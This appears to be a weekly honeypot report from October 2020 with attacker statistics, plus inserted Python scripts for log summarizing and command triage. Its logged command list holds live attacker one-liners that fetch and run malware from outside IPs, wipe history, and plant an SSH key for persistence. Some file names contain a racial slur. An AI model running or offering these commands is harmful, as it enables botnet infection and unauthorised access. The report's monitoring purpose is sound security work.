Honey Pot – Previous week 25 October 2020

This week we have seen an increase in activity on the Honey Pot, with 848 IPs recorded from 71 different countries. The number of successful login combos has dropped and the TCP forward count has remained stable.

Total attacking IPs: 848
Total Countries: 71
Total User/pass successful combos: 546
Total Commands ran: 204
Total TCP Forward: 16720
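As an added example (not part of the original report), here is a small Python script that derives these totals and the report's top-N lists from honeypot event logs. It assumes Cowrie-style JSON event lines (the report does not name the honeypot software, so that is an assumption) and embeds a constructed sample log with documentation-range addresses. Country totals need a GeoIP lookup and are not computed here.

```python
import json
from collections import Counter

# Constructed sample log in Cowrie-style JSON (assumption: the report does not
# say which honeypot it runs; field names follow Cowrie's JSON output).
# Source addresses are RFC 5737 documentation ranges, not real attackers.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.10", "session": "a1"}
{"eventid": "cowrie.login.success", "src_ip": "192.0.2.10", "username": "root", "password": "admin", "session": "a1"}
{"eventid": "cowrie.command.input", "src_ip": "192.0.2.10", "input": "uname -a", "session": "a1"}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "192.0.2.10", "dst_ip": "ya.ru", "dst_port": 80, "session": "a1"}
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.10", "session": "a2"}
{"eventid": "cowrie.login.success", "src_ip": "192.0.2.10", "username": "root", "password": "admin", "session": "a2"}
{"eventid": "cowrie.command.input", "src_ip": "192.0.2.10", "input": "uname -a", "session": "a2"}
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.10", "session": "a3"}
{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.10", "username": "admin", "password": "admin", "session": "a3"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "session": "b1"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "1234", "session": "b1"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "session": "b2"}
{"eventid": "cowrie.login.success", "src_ip": "198.51.100.7", "username": "root", "password": "1234", "session": "b2"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "crontab -l", "session": "b2"}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "198.51.100.7", "dst_ip": "ya.ru", "dst_port": 80, "session": "b2"}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "198.51.100.7", "dst_ip": "www.evernote.com", "dst_port": 443, "session": "b2"}
not json: a corrupt line that the parser must skip
"""


def parse_events(lines):
    """Yield parsed events, skipping blank or malformed lines instead of aborting."""
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            yield json.loads(raw)
        except json.JSONDecodeError:
            continue


def summarize(lines):
    """Compute the weekly totals and top-N counters the report presents."""
    connections = Counter()   # sessions per source IP
    combos = Counter()        # successful username/password pairs
    commands = Counter()      # command lines typed into the shell
    forwards = Counter()      # direct-tcpip (port forward) destinations
    for ev in parse_events(lines):
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            connections[ev["src_ip"]] += 1
        elif eid == "cowrie.login.success":
            combos["%s/%s" % (ev["username"], ev["password"])] += 1
        elif eid == "cowrie.command.input":
            commands[ev["input"]] += 1
        elif eid == "cowrie.direct-tcpip.request":
            forwards["%s:%s" % (ev["dst_ip"], ev["dst_port"])] += 1
    return {
        "total_attacking_ips": len(connections),          # distinct sources
        "total_successful_logins": sum(combos.values()),
        "total_commands": sum(commands.values()),
        "total_tcp_forward": sum(forwards.values()),
        "top_ips": connections.most_common(),
        "top_combos": combos.most_common(),
        "top_commands": commands.most_common(),
        "top_forwards": forwards.most_common(),
    }


def render(summary, top_n=30):
    """Format the summary in the report's '<count> <value>' list style."""
    out = [
        "Total attacking IPs: %d" % summary["total_attacking_ips"],
        "Total successful logins: %d" % summary["total_successful_logins"],
        "Total commands ran: %d" % summary["total_commands"],
        "Total TCP forward: %d" % summary["total_tcp_forward"],
    ]
    sections = (("Top IPs", "top_ips"), ("Top user/pass", "top_combos"),
                ("Top commands", "top_commands"), ("Top TCP forwards", "top_forwards"))
    for title, key in sections:
        out.append("")
        out.append(title)
        out.extend("%d %s" % (count, value) for value, count in summary[key][:top_n])
    return "\n".join(out)


if __name__ == "__main__":
    print(render(summarize(SAMPLE_LOG.splitlines())))
```

Malformed lines are skipped rather than aborting the run, because a week of honeypot output routinely contains truncated or partially written records; silently losing a whole report to one bad line is worse than undercounting by one.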

The same top IP ranges are still hitting the Honey Pot from Ireland. Nothing has really changed in the top 30 IPs.

5636 5.188.86.165
5455 5.188.86.167
5299 5.188.86.206
5234 5.188.87.57
5154 5.188.86.178
5102 5.188.86.168
5050 5.188.87.49
5031 5.188.86.212
4793 5.188.87.58
4771 5.188.86.221
4677 45.227.255.207
4432 5.188.87.60
4417 5.188.86.207
4361 5.188.86.169
4243 5.188.86.210
4232 5.188.86.164
3930 45.227.255.206
3842 5.188.87.51
3725 5.188.86.216
3614 5.188.87.53
3187 45.227.255.162
1831 45.227.255.161
1487 218.4.170.222
1341 88.214.26.91
1169 14.152.73.14
1127 120.240.95.157
1050 5.182.39.61
1018 88.214.26.92
967 5.182.39.64
913 5.182.39.63

China now tops the country list, with almost double the number of American IP addresses. We still see the same number of IPs from Ireland, which you can see in the top 30.

243 China
139 United States
56 France
49 Russia
31 Singapore
29 Germany
20 Netherlands
20 India
19 Brazil
18 Ireland
18 Vietnam
15 South Korea
14 Canada
14 Indonesia
12 Panama
12 Italy
11 United Kingdom
9 Republic of Lithuania
9 Poland
7 Hong Kong
6 Romania
6 Japan
6 South Africa
5 Iran
5 Argentina
4 Colombia
4 Thailand
3 Sweden
3 Republic of Moldova
3 Chile

The most common username/password combo is still root/admin, with over 10,000 login attempts, followed by 198 logins for root/1234.

107558 root/admin
198 root/1234
137 root/root
49 root/password
38 root/123456
28 root/1q2w3e4r5t
27 root/12345678
24 root/carlos
23 root/freedom
23 root/123

Compared to last week we have seen a threefold increase in commands run directly in the Honey Pot. Reviewing some of the IPs referenced in the payloads, the resources have been disabled. We also continue to see the Hentai attack. This week's top command is ‘uname -a’.

462 uname -a
250 uname -s -v -n -r
202 echo “PROC:nproc VER:uname -a
164 cat /proc/cpuinfo | grep name | wc -l
164 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
164 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
163 ls -lh $(which ls)
163 which ls
163 crontab -l
162 w
162 uname -m
162 cat /proc/cpuinfo | grep model | grep name | wc -l
162 top
162 uname
162 lscpu | grep Model
160 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
131 cat /etc/issue
64 uname -a;nproc
20 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
18 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
17 cat /etc/issue ; wget http://45.153.203.197/nigga.x86 ; curl -O http://45.153.203.197/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget http://45.153.203.197/nigga ; curl -O http://45.153.203.197/nigga.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget http://45.153.203.197/nigga.mips ; curl -O http://45.153.203.197/nigga.mips ; chmod 777 nigga.mips ; ./nigga.mips 0day.autoroot.mips ; wget http://45.153.203.197/nigga.arm ; curl -O http://45.153.203.197/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget http://45.153.203.197/nigga.arm5 ; curl -O http://45.153.203.197/nigga.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget http://45.153.203.197/nigga.arm6 ; curl -O http://45.153.203.197/nigga.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget http://45.153.203.197/nigga.arm7 ; curl -O http://45.153.203.197/nigga.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget http://45.153.203.197/nigga.ppc ; curl -O http://45.153.203.197/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget http://45.153.203.197/nigga.sh4 ; curl -O http://45.153.203.197/nigga.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget http://45.153.203.197/nigga.m68k ; curl -O http://45.153.203.197/nigga.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj http://45.153.203.197/bot.pl ; perl bot.pl ; curl -O http://45.153.203.197/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
14 wget 88.218.16.87/wash.sh curl -O http://88.218.16.87/wash.sh; chmod 777 wash.sh; sh wash.sh
12 cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
9 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.142/hentai.sh; curl -O http://194.180.224.142/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.142 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.142; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
7 wget http://23.95.186.183/wash.sh; curl -O http://23.95.186.183/wash.sh; chmod 777 wash.sh; sh wash.sh
3 /ip cloud print
3 ifconfig
3 cat /proc/cpuinfo
3 ps | grep '[Mm]iner'
3 ps -ef | grep '[Mm]iner'
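As an added example (not from the original report), the following Python snippet triages command lines like those in the list above from a defender's side: it tags each one as reconnaissance, downloader, payload execution, SSH-key persistence or anti-forensics, rates how much follow-up it deserves, and pulls out the payload-hosting addresses for a blocklist or IoC export. The rule names, regexes, SAMPLE_COMMANDS and the documentation-range addresses are all constructed for this example and are not taken from any tool or from the report's logs.

```python
import re

# Heuristic tags for behaviours visible in the honeypot's command list. These
# rules were written for this example; they are not a published detection set.
RULES = {
    "recon": re.compile(r"\b(?:uname|nproc|lscpu|ifconfig|crontab -l|free -m|which ls|w|top|ps)\b"
                        r"|cat /(?:proc/cpuinfo|etc/issue)"),
    "miner_check": re.compile(r"\[Mm\]iner"),          # attacker looking for rival miners
    "downloader": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "makes_executable": re.compile(r"chmod\s+(?:777|\+x)\b"),
    "executes_payload": re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|sh\s+\S+\.sh\b|perl\s+\S+\.pl\b)"),
    "ssh_key_persistence": re.compile(r"authorized_keys"),
    "anti_forensics": re.compile(r"history -c\b"),
    "cleanup": re.compile(r"rm -rf\b"),
}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SSH_KEY = re.compile(r'(ssh-(?:rsa|ed25519|dss))\s+(\S+)\s*([^\s"\'>]*)')


def normalize(cmd):
    """Undo the curly quotes that blog/CMS rendering substitutes for ' and "."""
    return (cmd.replace("\u201c", '"').replace("\u201d", '"')
               .replace("\u2018", "'").replace("\u2019", "'"))


def classify(cmd):
    """Tag one command line and rate how much follow-up it deserves."""
    cmd = normalize(cmd)
    tags = sorted(name for name, rx in RULES.items() if rx.search(cmd))
    if "ssh_key_persistence" in tags or ("downloader" in tags and "executes_payload" in tags):
        severity = "high"      # a foothold was attempted, not just fingerprinting
    elif "downloader" in tags or "anti_forensics" in tags:
        severity = "medium"
    else:
        severity = "low"
    result = {"severity": severity, "tags": tags, "hosts": []}
    if "downloader" in tags:
        # Payload hosts are worth blocking / reporting; sorted so output is stable.
        result["hosts"] = sorted(set(IPV4.findall(cmd)))
    m = SSH_KEY.search(cmd)
    if m and "ssh_key_persistence" in tags:
        # Key type, a blob prefix for matching, and the comment (often a tag the
        # attacker reuses across campaigns) are enough to hunt for the same key.
        result["ssh_key"] = {"type": m.group(1), "blob_prefix": m.group(2)[:12],
                             "comment": m.group(3)}
    return result


def triage(commands):
    """Classify many commands and return (command, result) pairs, most severe first."""
    order = {"high": 0, "medium": 1, "low": 2}
    rows = [(cmd, classify(cmd)) for cmd in commands]
    rows.sort(key=lambda r: order[r[1]["severity"]])
    return rows


def payload_hosts(commands):
    """Union of download hosts across all commands, for a blocklist or IoC export."""
    hosts = set()
    for cmd in commands:
        hosts.update(classify(cmd)["hosts"])
    return sorted(hosts)


# Constructed sample commands modelled on the shapes in the report. Hosts are
# RFC 5737 documentation addresses and the key blob is a dummy, not a real key.
SAMPLE_COMMANDS = [
    "uname -a",
    "cat /proc/cpuinfo | grep name | wc -l",
    "ps | grep \u2018[Mm]iner\u2019",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \u201cssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCexampleKEYblob== "
    "attacker\u201d>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
    "cd /tmp || cd /var/run || cd /; wget http://192.0.2.50/x/bin.x86; curl -O http://192.0.2.50/x/bin.x86; "
    "chmod +x bin.x86; ./bin.x86 Exploit.x86; rm -rf bin.x86; tftp 192.0.2.50 -c get bin.x86; history -c",
    "wget 203.0.113.9/wash.sh curl -O http://203.0.113.9/wash.sh; chmod 777 wash.sh; sh wash.sh",
]

if __name__ == "__main__":
    for cmd, info in triage(SAMPLE_COMMANDS):
        print(info["severity"], info["tags"], info["hosts"], cmd[:60])
    print("payload hosts:", payload_hosts(SAMPLE_COMMANDS))
```

The quote normalization step exists because the blog rendering of the command list above has replaced the straight quotes the attackers typed with curly ones; a rule that matched on the literal `'` or `"` would miss those lines.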

We continue to see TCP forward requests dominated by ya.ru (Yandex.ru). This has stayed at around the same number of requests. We also see an attack against Evernote.com (a note-taking app) targeting port 443.

78430 ya.ru:80
11044 www.evernote.com:443
6503 oauth.vk.com:443
6159 youtube.com:443
5892 23.60.196.214:443
5035 m.youtube.com:443
4719 51.159.19.168:80
4033 www.youtube.com:443
3877 www.google.com:443
3766 iforgot.apple.com:443
3748 www.amazon.com:443
3386 omegle.com:80
3281 api.sendspace.com:443
3245 69.195.128.18:80
2624 96.43.128.70:80
2581 ip.bablosoft.com:80
2452 74.125.137.27:25
2373 appleid.apple.com:443
2295 173.194.201.26:25
2001 108.177.97.27:25
1973 soundcloud.com:443
1770 74.125.28.26:25
1714 74.125.28.27:25
1691 64.233.162.27:25
1619 151.101.38.214:443
1587 108.177.97.26:25
1472 www.walmart.com:443
1354 67.195.204.75:25
1348 api.portis.io:443
1345 173.194.73.26:25

It is interesting to see the increase in traffic and malicious requests coming in. Let's see if the trend of China continues or a new country takes number 1.